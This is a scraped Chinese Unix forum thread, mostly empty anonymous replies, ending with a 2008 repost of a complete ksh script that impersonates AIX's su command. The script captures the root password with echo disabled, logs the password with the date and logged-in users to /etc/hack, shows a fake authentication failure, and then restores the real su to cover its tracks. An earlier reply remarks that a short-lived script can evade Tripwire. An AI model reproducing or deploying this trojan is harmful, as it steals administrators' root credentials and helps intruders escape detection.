 |
网友:
匿名网友
| 时间:2005-02-18 00:47:16 IP地址:61.51.141.★ |
|
|
|
|
|
 |
网友:
匿名网友
| 时间:2005-02-18 09:04:13 IP地址:202.74.105.★ |
|
|
|
|
|
 |
网友:
匿名网友
| 时间:2005-03-21 21:44:28 IP地址:218.79.2.★ |
|
|
|
|
|
 |
网友:
匿名网友
| 时间:2005-03-21 21:44:28 IP地址:218.79.2.★ |
|
|
|
|
|
 |
网友:
beginner-bj
| 时间:2005-03-21 22:48:21 IP地址:219.133.24.★ |
|
|
|
如果这个脚本存活的时间很短,还是很有可能逃过tripwire的眼睛的。
|
|
|
 |
网友:
beginner-bj
| 时间:2005-03-21 22:48:21 IP地址:219.133.24.★ |
|
|
|
如果这个脚本存活的时间很短,还是很有可能逃过tripwire的眼睛的。
|
|
|
 |
网友:
beginner-bj | 时间:2008-05-20 23:11:19 IP地址:219.134.2.★ |
|
|
|
发现本文被很多人转贴,但格式都是乱的,这和2005年时的CU BLOG有关。现在重新贴一下:
#!/bin/ksh
# script name: su
# function: a fake su used in AIX
# author: beginner@yeah.net http://blog.chinaunix.net/index.php?blogId=739
printf "root's Password:"
stty -echo
read PASSWD
stty echo
date >> /etc/hack
who >> /etc/hack
echo "$PASSWD" >> /etc/hack
printf "\n3004-501 Cannot su to "root" : Authentication is denied.\n"
mv -f /usr/bin/su2 /usr/bin/su
|
|
|